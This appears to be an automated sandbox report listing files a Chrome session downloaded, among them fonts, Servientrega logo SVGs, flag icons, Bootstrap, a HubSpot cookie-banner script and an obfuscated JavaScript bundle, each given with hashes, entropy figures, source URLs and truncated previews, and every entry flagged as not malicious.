            Preview:.PNG........IHDR...............S....pHYs.................sRGB.........gAMA......a....pIDATx....b.I....x.}..w...[L....O.R.fg.+.K..p..`.O..........'...._.......z..}O...|...g..Cp....._....G.z..K$..z....y..|..U.P_.m..c-y...y.G?u..l...E.Rl...-\..^.%..A.h]L.2........o..bO....p.6....!..0(...V....CAz.^b..5..y_.We...hc.u..#$3...{.t...m...........G.{...?..#.o.0.p~^k.....&..b.5h..?..%+..yd..S..{X..Q..}r.o../s...2".o.9p<...y/h....>.lT.@....;.....).6.._..h.....9..!P>.....#...w<).........A..M..|Z...:.f.....z......J(l..&2N%.S..X.?.a.....a..0..A.....!aqz....?.......G..{]<AU.M......?..12._m2."A.Nx............+V~..0.76..~....X.....M,...C..X..H.>'....%.qBM.sXIa..:.ci..X4.k..i.'.`.E,..W.......r..../CY.8r._..QREs....y.'._.d...q.?...=.\.E...s.......'(..q..'.id.`..F..u.q.p.b5,LocJ....q:MX.K.y.4.v.X}}..;..zm2....-..D.......Mrp....^..D.y....hL.n.o.......W.oQp.......<.G.....a.(..!.....<,7.I..0t............?..*R.\..~..I...o...R..#V..R.......iEg...U.Y..?$..U..t.....p....F|T7
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text
            Category:downloaded
            Size (bytes):822
            Entropy (8bit):5.424954749254595
            Encrypted:false
            SSDEEP:24:3xOYUMay0RVc+u/rxOYUMay1wy96DGSSf7:hOxMay0RVc+ulOxMay1N0oD
            MD5:3F0085B5605C9D8FC1602390159C7E4C
            SHA1:09945E9CE3C9DBFEAE493D1AEC315C724BBE4686
            SHA-256:3CA4AFB5253DED897344D9F25A57466566159C563600F96DD246EC0DE943CE13
            SHA-512:54B2BD6F5AEA4601781679B97C6F2B7D9C8356063ACDA35E09FFCA8EEF7F9319B76862310531D2F4E3836C6A2CAB368BA6664F0B739D930D32E581769EA53601
            Malicious:false
            Reputation:low
            URL:https://fonts.googleapis.com/css2?family=Urbanist:wght@600&display=swap
            Preview:/* latin-ext */.@font-face {. font-family: 'Urbanist';. font-style: normal;. font-weight: 600;. font-display: swap;. src: url(https://fonts.gstatic.com/s/urbanist/v15/L0xjDF02iFML4hGCyOCpRdycFsGxSrqDFRkvH5mqe8Q.woff2) format('woff2');. unicode-range: U+0100-02AF, U+0304, U+0308, U+0329, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Urbanist';. font-style: normal;. font-weight: 600;. font-display: swap;. src: url(https://fonts.gstatic.com/s/urbanist/v15/L0xjDF02iFML4hGCyOCpRdycFsGxSrqDFRkvEZmq.woff2) format('woff2');. unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;.}.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with no line terminators
            Category:downloaded
            Size (bytes):16
            Entropy (8bit):3.875
            Encrypted:false
            SSDEEP:3:H2ynY:PnY
            MD5:C30802BA6F7C5D689390B8413EF07B78
            SHA1:4E5FB1E738CA7FEF19AFDF98554FDF17D700095D
            SHA-256:47AEB2FE940279A6DA873EFDB433131A501BC3E59E1BD6649E8E620A36B0CE93
            SHA-512:751232B30AC1EF49B6C881F6F62F86453CB04F33F018E5BFC3D3B92A6F467D9E9377DAD67828CE3ADC43D999942EC03A6F660CD21C311700C4EA4845B07AC43C
            Malicious:false
            Reputation:low
            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSEAmLxg8OQk4rVRIFDbmZCLw=?alt=proto
            Preview:CgkKBw25mQi8GgA=
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):14308
            Entropy (8bit):4.27255113143574
            Encrypted:false
            SSDEEP:384:v9qPPPM+c+7ggBesrezsq4MbBAUGi+ggA:v9ok+J0QrzqBGFA
            MD5:38FFB1C52979DECA1D28D49D2A8CB4AC
            SHA1:ECF007736CC5BB152434049020ED5863A747D84D
            SHA-256:227565DEF1FB1F4B9363275E84804BBBD85CADF3B54B3E90883C6E456728D90A
            SHA-512:C101AD2542579AB2C09AF60F6CA1F768CC2596C99F77D9893BCE28F080347D5D5094D30B24045C10304FF4D05FF47A41F5F0ED2032168E77E0B70D17E3D915EA
            Malicious:false
            Reputation:low
            URL:https://www.servientrega.com/wps/contenthandler/!ut/p/digest!dWYvvbhKekcZQKtCvzyVng/dav/fs-type1/themes/New-Theme-Servientrega/images/svg/logo-servientrega-verde.svg
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="219px" height="37px" viewBox="0 0 219 37" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <defs>.. <linearGradient x1="0.48428887" y1="1.0148883" x2="0.51598674" y2="-0.014888338" id="gradient_1">.. <stop offset="0" stop-color="#009A44" />.. <stop offset="1" stop-color="#56C271" />.. </linearGradient>.. <linearGradient x1="-0.0007526911" y1="0.5000954" x2="1" y2="0.5000954" id="gradient_2">.. <stop offset="0" stop-color="#C5C5C5" />.. <stop offset="0.2" stop-color="#DADADA" />.. <stop offset="0.47" stop-color="#EEEEEE" />.. <stop offset="0.74" stop-color="#FBFBFB" />.. <stop offset="1" stop-color="#FFFFFF" />.. </linearGradient>.. <linearGradient x1="-0.00091793993" y1="0.50000405" x2="0.9996366" y2="0.50000405" id="gradient_3">.. <stop offset="0" stop-color="#FFFFFF" />.. <stop offset="0.26" stop-color="#FBFBFB" />.. <stop
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (52350)
            Category:dropped
            Size (bytes):53555
            Entropy (8bit):5.230265232165562
            Encrypted:false
            SSDEEP:1536:RAn6CSJREGPG+2uZ8w/Hupaxn+XmxMAwDR+F:W6CSJRJj2uZh/UC+WxMAwQF
            MD5:2A5DD6EFBF0BAA60EA160589DD726A5B
            SHA1:3060D83734324095F001DFFE217E5AB08C8F7B65
            SHA-256:ED3131AADB5AE07949EA19DD3B05F4EE6D05FA96706D144D407199D36DEEF753
            SHA-512:9DB275C2085F47B096D8EEA93B42B59A69489DE22AA894B947DB095C5C7589094B3EDB0582B160BDE41FE814E4C6ADA2B187C789800D53C0DF7B213225482ABA
            Malicious:false
            Reputation:low
            Preview:const a19_0x5b7454=a19_0x4fa0;(function(_0x23dfe7,_0x52eff6){const _0x15ff47=a19_0x4fa0,_0x55c0f4=_0x23dfe7();while(!![]){try{const _0x269b9c=-parseInt(_0x15ff47(0x23b))/0x1+parseInt(_0x15ff47(0x24e))/0x2*(parseInt(_0x15ff47(0x220))/0x3)+-parseInt(_0x15ff47(0x297))/0x4+parseInt(_0x15ff47(0x21f))/0x5+parseInt(_0x15ff47(0x202))/0x6*(-parseInt(_0x15ff47(0x282))/0x7)+-parseInt(_0x15ff47(0x2ad))/0x8*(-parseInt(_0x15ff47(0x233))/0x9)+parseInt(_0x15ff47(0x1f3))/0xa*(-parseInt(_0x15ff47(0x1c7))/0xb);if(_0x269b9c===_0x52eff6)break;else _0x55c0f4['push'](_0x55c0f4['shift']());}catch(_0xbd9262){_0x55c0f4['push'](_0x55c0f4['shift']());}}}(a19_0x13b0,0x55457));import{s as a19_0x2e3254,u as a19_0x27bd72,x as a19_0x1e98b9,r as a19_0x3f1aba,n as a19_0x39a09e,y as a19_0x48f11e,d as a19_0x5e11a3,z as a19_0x15e471,A as a19_0x3c8d9a,a as a19_0x4334da,w as a19_0x3533e8}from'./index-7c1edef8.js';function a19_0x4fa0(_0x3a77bd,_0x232e91){const _0x58a9dc=a19_0x13b0();return a19_0x4fa0=function(_0x304c44,_0x3a3
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 1000 x 795, 8-bit colormap, non-interlaced
            Category:downloaded
            Size (bytes):177765
            Entropy (8bit):7.964926271395501
            Encrypted:false
            SSDEEP:3072:rEwobnN+4WN4lwN6EDgCN61HYDmZECBjdT7qQRr/zn3cKmJvqw0Se/xIyZNkR:wwoTU4VIHEYDFgTOQRr/zcJyh/qyZNkR
            MD5:BAD39D54A8EC716451CF9931F87713C9
            SHA1:43BB7E324ED20B8EC0F500673C434C47CA246270
            SHA-256:C7A660D851BE4759B581127537F2FB76572D0015A28D1BFC7997C04160001853
            SHA-512:959EEE4E6B2BB072764F4C7E5E5AEA3FC9DA3CE0F4C158E5396F4F96B12757AB92A516710B33CCA9C23736B5DF7D020C88E29BA4C4F93C6B6217ECB5A037E1FB
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/port2-m.png
            Preview:.PNG........IHDR..............{Oa....PLTE.......................................@q!.#.....................Cxx........".............-.....($0........H|-.......yxx...,,X.G~..........P...C>L...f....5..........L..*'AL.....:..=.......U.................l..42=TL[f..G..@..\..S...P..../..^...B}..E..D...............D...g`...:..~...&=....-d....BZ.4L%]zS..<..^cf.zX+......%:R_.Zmmn.~[.K...k6%..F}...{..U....3i.s..~C...........Ok......k....Gx.T.Kw......r..R...[..`..Ws.....H..;v.....a.b...$.l..Hes.....Vt..m...S.{z..!.tS.z..gg.La....a.:g..0.Uz.lh.cC......h..V<6......R...cy......vpl.......t...D....e.1.....^].D'.....t.Yi....8j.g..7R.'..|....z.........7..F...oy...zIQ.x...m;a9BF)0d...O..G...aE..(...U.!.....L3.(..V...........[.....U..}Iv..N.........5..\..un..&[...j..d...0.t....tRNS....8....IDATx..[..6...p4y.36....u...t.AYIm..6..@.ez....../../...o?...O.j..\h......o..ot...c...g7..K.*P..k..1.....l..P.........'.}...K.d|.:r...a..S{C<=.E.P....7.F_.nC.Vd.#
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):25821
            Entropy (8bit):4.40402848184812
            Encrypted:false
            SSDEEP:192:Lrh963ROda6jjEi/rGewdt7yM6eJe/ahXi/OGen3Qrdn/vRni/YGeRkt7aK6e5ep:nh9mOM6nseMhb3e9RVVU73TAd
            MD5:0462C275036497B098EBF1024AFDA963
            SHA1:CBF50789EBB5468D18E3A00C8026088E8DF1FEA2
            SHA-256:8F1F0A6BB665FA3AB90141CCCD52C27299D353DAA4CD6F2AD9358C145D314D91
            SHA-512:F85547BFA5CB197BDCDD46E441F74C4277BE8E6B0A9AD5E715E810DB2D5F8F1821F632D0FE44FB99DC8A85400F20F3F17BBBC3A58565D0C872584AA8105CA273
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/layout/images/50.svg
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="23px" height="15px" viewBox="0 0 23 15" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <g id="united-states">.. <path d="M21.2775 0L1.72253 0C0.771174 0 0 0.76764 0 1.71464L0 13.2853C0 14.2323 0.771174 15 1.72253 15L21.2775 15C22.2288 15 23 14.2323 23 13.2853L23 1.71464C23 0.76764 22.2288 0 21.2775 0Z" transform="translate(0 4.4716053E-05)" id="Path" fill="#F5F5F5" stroke="none" />.. <g id="Group" transform="translate(0 4.4716053E-05)">.. <path d="M0 1.15385L22.8105 1.15385C22.5771 0.482352 21.9367 0 21.1827 0L1.62779 0C0.87382 0 0.233459 0.482352 0 1.15385Z" transform="translate(0.094740234 0)" id="Path" fill="#FF4B55" stroke="none" />.. <path d="M0 0L23 0L23 1.15381L0 1.15381L0 0Z" transform="translate(0 4.6153226)" id="Rectangle" fill="#FF4B55" stroke="none" />.. <path d="M0 0L23 0L23 1.15381L0 1.15381L0 0Z" transform="translate(0 2.3075273)" id="Rectangle" fill=
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):13939
            Entropy (8bit):4.674263072989602
            Encrypted:false
            SSDEEP:192:85QCVUL98q23z2yv0U1bHCZ5l2dgW340hZKOfFtUBbyVcBxMZr6iAOuE5Gt:8LyyZHCZ5l2dn340hX9oxMZr7AOuE5Gt
            MD5:BE3DE397B91CC4C1B0F80675727B8895
            SHA1:494319C0BEDAEA38986B69DE68FFB17EF5BAB91F
            SHA-256:A5F2180E3F00E486D08D6266503EDDBE5670C03A119DA66FA824CC988001964F
            SHA-512:0D58FB314788CA586842595AC0148056AE04272E2D0E27632584722B799DE9473C60E49CB324C77B130BBE2C3CA2C064044933F0577F0AE69C7C55F2328662AB
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/layout/images/48.svg
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="23px" height="16px" viewBox="0 0 23 16" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <g id="ecuador">.. <path d="M0 2.04198C0 2.99202 0.771174 3.76221 1.72253 3.76221L21.2775 3.76221C22.2288 3.76221 23 2.99206 23 2.04198L23 0L0 0L0 2.04198Z" transform="translate(0 11.286621)" id="Path" fill="#FF4B55" stroke="none" />.. <path d="M21.2775 0L1.72253 0C0.771174 0 0 0.770144 0 1.72023L0 7.52441L23 7.52441L23 1.72023C23 0.770144 22.2288 0 21.2775 0Z" id="Path" fill="#FFE15A" stroke="none" />.. <path d="M0 0L23 0L23 3.76212L0 3.76212L0 0Z" transform="translate(0 7.524414)" id="Rectangle" fill="#41479B" stroke="none" />.. <path d="M0 2.47943L2.89656 0L2.89656 3.58837C2.89656 4.19315 2.40561 4.68336 1.80011 4.68336L1.80011 4.68336C1.52923 4.68336 1.26792 4.58322 1.06658 4.4023L0 3.44369L0 2.47943L0 2.47943Z" transform="translate(11.0859375 5.267212)" id="Path" fill="#FFE15A" stroke
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):1101
            Entropy (8bit):4.851720620025946
            Encrypted:false
            SSDEEP:12:TMHd4lniOaYxJNTb/lR2kvJ/D4n3rTMwMlLSA3A37bLVYyV+qwuqpJFIFMoW5mqL:2dUnjTxJNJRwTMwtF+3ueua5mq928DY2
            MD5:B986C13F9976E2CE0FCBB3C0F54DBA5B
            SHA1:E95575D872662C3A2C9474A4CCDABA59F27CD755
            SHA-256:9D6418C154873B4D8B682F6ED4E6CE94EED2099C9DE5CB8F2949C86518ADD60A
            SHA-512:CB32283BADCAA508771186C8946A407FE27EC1DE762CEB5A992C813158D01FE50D8CAD3543D39450535559F9263FE038D9E38864B531ED7855A5102C78553D04
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="23px" height="23px" viewBox="0 0 23 23" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <g id="linkedin">.. <path d="M11.5 0C17.8516 0 23 5.14912 23 11.5C23 17.851 17.8516 23 11.5 23C5.14833 23 0 17.8509 0 11.5C0 5.1492 5.14841 0 11.5 0Z" id="Path" fill="#0E76A8" fill-rule="evenodd" stroke="none" />.. <path d="M0.0115269 10.051L2.16492 10.051L2.16492 2.87351L0.0115269 2.87351L0.0115269 10.051ZM8.40081 2.62489C7.35573 2.62489 6.42063 3.00654 5.75728 3.84895L5.75728 2.8499L3.59599 2.8499L3.59599 10.051L5.75728 10.051L5.75728 6.15686C5.75728 5.33387 6.51127 4.53101 7.45568 4.53101C8.4001 4.53101 8.633 5.33387 8.633 6.13672L8.633 10.0503L10.7864 10.0503L10.7864 5.97645C10.7863 3.14668 9.4466 2.62489 8.40081 2.62489ZM1.07816 2.15624C1.67329 2.15624 2.15632 1.67321 2.15632 1.07808C2.15632 0.482945 1.67329 0 1.07816 0C0.483024 0 0 0.483024 0 1.07816C0 1.67329 0.483024 2.15624 1.07816 2.15
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (50758)
            Category:downloaded
            Size (bytes):51039
            Entropy (8bit):5.247253437401007
            Encrypted:false
            SSDEEP:768:E9Yw7GuJM+HV0cen/7Kh5rM7V4RxCKg8FW/xsXQUd+FiID65r48Hgp5HRl+:E9X7PMIM7V4R5LFAxTWyuHHgp5HRl+
            MD5:67176C242E1BDC20603C878DEE836DF3
            SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
            SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
            SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
            Malicious:false
            Reputation:low
            URL:https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/js/bootstrap.min.js
            Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (1448), with no line terminators
            Category:dropped
            Size (bytes):1448
            Entropy (8bit):5.2104630399140826
            Encrypted:false
            SSDEEP:24:iIbEehRRquHNUglFepRWZFwrBeNRZRR94uHstvJSuRWZ0fpkRRquHNVnmlFepRWn:iIbphsEkpwIA9pcd5wmpkYkpwcc4I
            MD5:BA065E4DEE5B2345AA53E1555A5EBACA
            SHA1:4CD9D5DD4F401E695AD9B88625E9FE1B6FFE03AF
            SHA-256:DE945EF33593141358A346DCB718446BE0EFA0E6DA3613ABEDB3B138B9134960
            SHA-512:378C0D3BF3F78999F1D3C44D6900B020230C59F4D6CCAAFB3D804EE04DC2D1FC8DFF0B57E7BB7819E755C8A56C05B21C6DAA0B873ADF7A14CBD1B7B8B848CEB5
            Malicious:false
            Reputation:low
            Preview:var _hsp=window._hsp=window._hsp||[];_hsp.push(['addEnabledFeatureGates',[]]);_hsp.push(['setBusinessUnitId',0]);!function(t,e,r){if(!document.getElementById(t)){var n=document.createElement("script");for(var a in n.src="https://js.hs-banner.com/v2/22144436/banner.js",n.type="text/javascript",n.id=t,r)r.hasOwnProperty(a)&&n.setAttribute(a,r[a]);var i=document.getElementsByTagName("script")[0];i.parentNode.insertBefore(n,i)}}("cookieBanner-22144436",0,{"data-cookieconsent":"ignore","data-hs-ignore":true,"data-loader":"hs-scriptloader","data-hsjs-portal":22144436,"data-hsjs-env":"prod","data-hsjs-hublet":"na1"});!function(e,t){if(!document.getElementById(e)){var c=document.createElement("script");c.src="https://js.hs-analytics.net/analytics/1727397000000/22144436.js",c.type="text/javascript",c.id=e;var n=document.getElementsByTagName("script")[0];n.parentNode.insertBefore(c,n)}}("hs-analytics");!function(t,e,r){if(!document.getElementById(t)){var n=document.createElement("script");for(va
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):1700
            Entropy (8bit):4.469771756896555
            Encrypted:false
            SSDEEP:48:cTg8HBFc/39YzcpGXGikwU+TK8gssy5eeO3/iAiDpm/xE7b4udM:/8HBF8pGfkwU+eo5eejlEB
            MD5:D66D5AAA1970D9289EDF2B9341DE9995
            SHA1:6587878621F7748956604AF987240FC69550ECB9
            SHA-256:EFF55D137084E07D65BA61FE2F1E0AA6B9C2F960161DC8A68CE66284ACE6C9CE
            SHA-512:B89A8BF61C810CE7F786810DE2FA2B423E54720F61C18101C05676B06C4425A69EB5D3BEE58BB5A745EFCD176E15096C11C664EE30D89BB0E9D5498FA4CB2058
            Malicious:false
            Reputation:low
            URL:https://www.servientrega.com/wps/contenthandler/!ut/p/digest!dWYvvbhKekcZQKtCvzyVng/dav/fs-type1/themes/New-Theme-Servientrega/images/svg/ico-contactenos.svg
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="33px" height="29px" viewBox="0 0 33 29" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <g id="headphones-(1)" transform="translate(0.15000153 0.14990234)">.. <path d="M28.1326 11.387C27.9954 8.40438 26.7645 5.61975 24.6068 3.50244C22.3188 1.24401 19.262 0 16 0C9.48411 0 4.16452 5.06077 3.86849 11.3869C1.67285 11.7783 0 13.66 0 15.9266L0 19.2568C0 21.8061 2.1125 23.88 4.70937 23.88L4.8474 23.88L4.8474 25.0938C4.8474 26.8261 6.28282 28.2353 8.0474 28.2353L15.4193 28.2353C16.0083 28.2353 16.4859 27.7664 16.4859 27.1881C16.4859 26.6099 16.0083 26.141 15.4193 26.141L8.0474 26.141C7.45938 26.141 6.98073 25.6711 6.98073 25.0938L6.98073 23.88L8.60938 23.88C9.19844 23.88 9.67605 23.4111 9.67605 22.8328L9.67605 12.3506C9.67605 11.7723 9.19845 11.3034 8.60938 11.3034L6.00619 11.3034C6.34173 6.17164 10.6893 2.0943 16 2.0943C18.6901 2.0943 21.2094 3.11896 23.0963 4.98112C24.8329 6.68537 25.8414 8
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):8357
            Entropy (8bit):4.726446810395012
            Encrypted:false
            SSDEEP:192:O+KjZIPCbIozbsTCySpxK3aAX7MYcHgVW1+fm:OnXyi6aIwdUW1+u
            MD5:6F6C51CB2AA4BC332004FF9FAE3C906E
            SHA1:5E7F28CD85D1C87F2E47B9E7B6ABCC1AA34D850A
            SHA-256:32A1C04A6D5B10F5877EE69208ADF04A9210C0C44D97F961F334CF5C2BFE63E3
            SHA-512:615B0E83E539D62370A46529CE23BDF6AE07C2EE561E8652A13EB34F1D06C9700FB4CBA3FF52C9DC8D3C45AA5FF2587CD7E4E0E5EAB457A12ADF96E33FBAF572
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 25.0.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. viewBox="0 0 218 38" style="enable-background:new 0 0 218 38;" xml:space="preserve">.<style type="text/css">...st0{fill:url(#Path_6_);stroke:#FFFFFF;stroke-width:2.16;}...st1{fill:url(#Path_7_);}...st2{fill:#FFFFFF;}...st3{fill:url(#Path_8_);}...st4{fill:#97999B;}.</style>.<g id="Symbols">..<g id="Footer" transform="translate(-98.000000, -74.000000)">...<g id="Logo-nuevo" transform="translate(100.000000, 76.000000)">....<g id="Group-4">...........<linearGradient id="Path_6_" gradientUnits="userSpaceOnUse" x1="-183.9874" y1="425.0515" x2="-183.956" y2="426.081" gradientTransform="matrix(33.826 0 0 -34 6238.9487 14486.252)">......<stop offset="0" style="stop-color:#009A44"/>......<stop offset="1" style="stop-color:#56C271"/>....
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 601 x 646, 8-bit/color RGBA, non-interlaced
            Category:dropped
            Size (bytes):148601
            Entropy (8bit):7.991526800652537
            Encrypted:true
            SSDEEP:3072:kMlgqyyrjDd6VL01k/I7Ky1Hr/pSeHB1yNVAduoz28+pUAx:kh4PBKWlr/pNB1wVAcoIx
            MD5:4D83660D4072B46A1B5A2FDF3A724DE8
            SHA1:3C3A84B6729B6DA763E8CB51C6560B28617A58E8
            SHA-256:21318304D0A8CA4FB8D8A72493A5ED6AACF13FFC93B094DA0FF507906A032B92
            SHA-512:6B11556C922F7C69375C23D0CEF7FD0D609A70300F43EB37DE7D0782E3DFA9E3B371C8C1E42BA93D9528772170100E6E3854B0E74D74A445FF1BF9D4DCE5ACCB
            Malicious:false
            Reputation:low
            Preview:.PNG........IHDR...Y.........y.......pHYs...%...%.IR$.....sRGB.........gAMA......a...D.IDATx....dUu-.v54`..!.+*.<0"F..5Q.)..1/.".^..1..(&.Q_...Wc4WM.\....FA|../....3......?..E.8......{.:U.>u..._W..W.v..k.9..3.................................................................................................................................m.i..K.....kt.e..#..EEEEEEE.^.Gh..)..P$N..D..*.m...........M.!<~QS"M.n....."......UTTTTTTTl...Y.......h.F.2B..T.................J....jJ......}...>..d...b.b.****.*(.):....IDE.-..Fw..`.,...aT...<..m .....Ck..w....4$...........(...R...y.....u.(V!..(....I."b..j.K.T6_.Y>.Oc...Y..UTTTTTT.hsk..G.d...J_.:....P >n..|l..QpZ.P&ui{.O.0..?..7.H\.PV.UQQQQQ./c .8H,.#.%=............-...W...q.DP.........0@.B.0N...........(...3. ....,..... Q*...G~.}.,.........@....W..a..eD..u..Nz...".........J.z.. ....,.,.#7%.D.2r.B.h..O..I...l..CS.!'.a..9. ..rY/TTTTTTTl....D(.......j"!..b$D&#]....1..9...2...%{.FK..#.m..?..s.1..K.f...#..........C.g.".#..
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):41
            Entropy (8bit):4.180365114215879
            Encrypted:false
            SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
            MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
            SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
            SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
            SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
            Malicious:false
            Reputation:low
            Preview:{"code":1,"message":"Session ID unknown"}
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):1080
            Entropy (8bit):4.781460297851692
            Encrypted:false
            SSDEEP:24:2dZnmPLD/veaxMn+xV0Ll4My2R+tyH9R/rcHKH9R/pH9Rr:cZmjkMITiSFr
            MD5:F86D350868B114B43D8E978026E2DD78
            SHA1:3643CDA9FE6C5DFAEB0C16035B5A41A8C677450A
            SHA-256:84DF6C27C12E4D7283CF3632AE8E5746606B6F1CF6032F733646BE2DD2906658
            SHA-512:8C9CE80B88B1CAF2385ABA96A74EDF7206159D043E992FC8EB68A8BD088EA344F3E3478D658BB9BADC96274F3D8B60195D137D0B35E4CC2339EE9D204E6DECEB
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="UTF-8"?>..<svg width="55px" height="55px" viewBox="0 0 55 55" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">.. <title>Group 58</title>.. <g id="HOME" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">.. <g transform="translate(-1029.000000, -699.000000)" id="Group-58">.. <g transform="translate(1029.000000, 699.000000)">.. <g id="Group-55" fill="#3B4DE9">.. <rect id="Rectangle" x="0" y="0" width="55" height="55" rx="18"></rect>.. </g>.. <g id="Group-14" transform="translate(15.000000, 18.000000)" fill="#FFFFFF">.. <rect id="Rectangle" x="11.34" y="0" width="12.96" height="3.24" rx="1.62"></rect>.. <rect id="Rectangle" x="4.86" y="7.29" width="12.96" height="3.24" rx="1.62"></rect>.. <rect id="Rectangle" x="0" y="15.39" width="12.96" height="3.24" rx="1.62"
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):1717
            Entropy (8bit):5.005651701719216
            Encrypted:false
            SSDEEP:24:2dqAALfE26pkx2jmpByWakQoHKoulC9XtSUXH0XmRBzIVSK60YP4AGpZ:cqAQfE1kxbyWEoqo3sWHLRBzj208Z
            MD5:C39A650483FE20BAC0E3C1B8EBA355C5
            SHA1:D72E540D78FA191487130F839DA06EFC5749AFFC
            SHA-256:AE1FE90F2FC728C0C50E9F3C8B4568A2E768F9CE8EEE009131636AA42004B65F
            SHA-512:5B15E42B649A2383D2F5AD3B8AC1470D69341D0828EB87007FDEC39A342F31EB367A54528FB08D744E9590E220EBD19979CCDE633A995526F47BD40503E866EA
            Malicious:false
            Reputation:low
